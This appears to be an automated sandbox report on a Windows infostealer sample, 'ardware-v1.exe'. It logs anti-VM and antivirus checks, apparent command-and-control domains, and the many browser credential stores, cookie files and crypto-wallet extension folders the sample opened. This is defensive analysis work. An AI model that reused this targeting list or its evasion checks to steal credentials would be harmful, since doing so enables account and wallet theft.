Source: ardware-v1.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ardware-v1.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ardware-v1.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ardware-v1.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ardware-v1.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\ardware-v1.exe | Code function: 0_3_00B0DE71 push eax; ret | 0_3_00B0DE79
Source: C:\Users\user\Desktop\ardware-v1.exe | Code function: 0_3_00B09712 push ecx; retf | 0_3_00B09738
Source: C:\Users\user\Desktop\ardware-v1.exe | Code function: 0_3_00B0DCDA push eax; ret | 0_3_00B0DCE1
Source: C:\Users\user\Desktop\ardware-v1.exe | Code function: 0_3_00B09CC1 pushad ; retf | 0_3_00B09CC9
Source: C:\Users\user\Desktop\ardware-v1.exe | Code function: 0_3_00B0DD4A push eax; ret | 0_3_00B0DD59
Source: C:\Users\user\Desktop\ardware-v1.exe | Code function: 0_3_00A8C868 push edx; iretd | 0_3_00A8CC4B
Source: C:\Users\user\Desktop\ardware-v1.exe | Code function: 0_3_00A8B860 push edx; iretd | 0_3_00A8B863
Source: C:\Users\user\Desktop\ardware-v1.exe | Code function: 0_3_00B01106 push eax; ret | 0_3_00B0110D
Source: C:\Users\user\Desktop\ardware-v1.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\ardware-v1.exe | System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\ardware-v1.exe TID: 1988 | Thread sleep time: -210000s >= -30000s
                Source: C:\Users\user\Desktop\ardware-v1.exe TID: 5320 | Thread sleep time: -30000s >= -30000s
                Source: C:\Users\user\Desktop\ardware-v1.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049146152.00000000035A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: ardware-v1.exe, ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121039700.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3121763569.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3152923303.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2934962608.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220218856.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: ardware-v1.exe, 00000000.00000003.3049146152.00000000035A7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: ardware-v1.exe, 00000000.00000003.3219399245.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220131253.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW@
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: ardware-v1.exe, 00000000.00000003.3049302910.0000000003535000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\ardware-v1.exe | Process information queried: ProcessInformation

                HIPS / PFW / Operating System Protection Evasion

                Source: ardware-v1.exe, 00000000.00000002.3219801106.00000000006F6000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: debonairnukk.xyz
                Source: ardware-v1.exe, 00000000.00000002.3219801106.00000000006F6000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: diffuculttan.xyz
                Source: ardware-v1.exe, 00000000.00000002.3219801106.00000000006F6000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: effecterectz.xyz
                Source: ardware-v1.exe, 00000000.00000002.3219801106.00000000006F6000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: deafeninggeh.biz
                Source: ardware-v1.exe, 00000000.00000002.3219801106.00000000006F6000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: immureprech.biz
                Source: C:\Users\user\Desktop\ardware-v1.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\ardware-v1.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: ardware-v1.exe, ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\ardware-v1.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: ardware-v1.exe PID: 1972, type: MEMORYSTR
                Source: ardware-v1.exe | String found in binary or memory: Wallets/Electrum
                Source: ardware-v1.exe | String found in binary or memory: Wallets/ElectronCash
                Source: ardware-v1.exe | String found in binary or memory: window-state.json
                Source: ardware-v1.exe | String found in binary or memory: Wallets/JAXX New Version
                Source: ardware-v1.exe, 00000000.00000003.3121039700.0000000000A7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb3
                Source: ardware-v1.exe | String found in binary or memory: Wallets/Ethereum
                Source: ardware-v1.exe, 00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: ardware-v1.exe, 00000000.00000003.3120968564.0000000000B03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\ardware-v1.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
